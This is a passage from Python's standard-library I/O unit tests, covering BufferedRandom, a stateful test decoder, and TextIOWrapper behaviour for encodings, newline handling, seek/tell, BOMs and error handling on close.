self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are period-terminated (variable-length mode).
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
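# State sketch: getstate() right after reset() returns (b'', 0) because
# i == o == 1 and the XOR-1 packing maps both to 0; with, say, i=2, o=6
# and b'x' buffered it would return (b'x', 307), i.e. 3*100 + 7.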
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
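# Padding/truncation sketch: with O=6 the buffered word b'xyz' becomes
# 'xyz---.' (padded with hyphens to six characters plus the period), while
# b'toolongtofit' is cut down to 'toolon.' -- compare the 'i.o6.' test
# vector in StatefulIncrementalDecoderTest below.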
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
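# Usage sketch (assuming the standard codecs search-function protocol):
# once a test flips codecEnabled to True, codecs.lookup('test_decoder')
# resolves through lookupTestDecoder() above, so a TextIOWrapper can be
# opened with encoding='test_decoder' for reading in the seek/tell tests.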
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8":  # , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
# Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# Read in amounts equal to TextIOWrapper._CHUNK_SIZE, which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
def _check_create_at_shutdown(self, **kwargs):
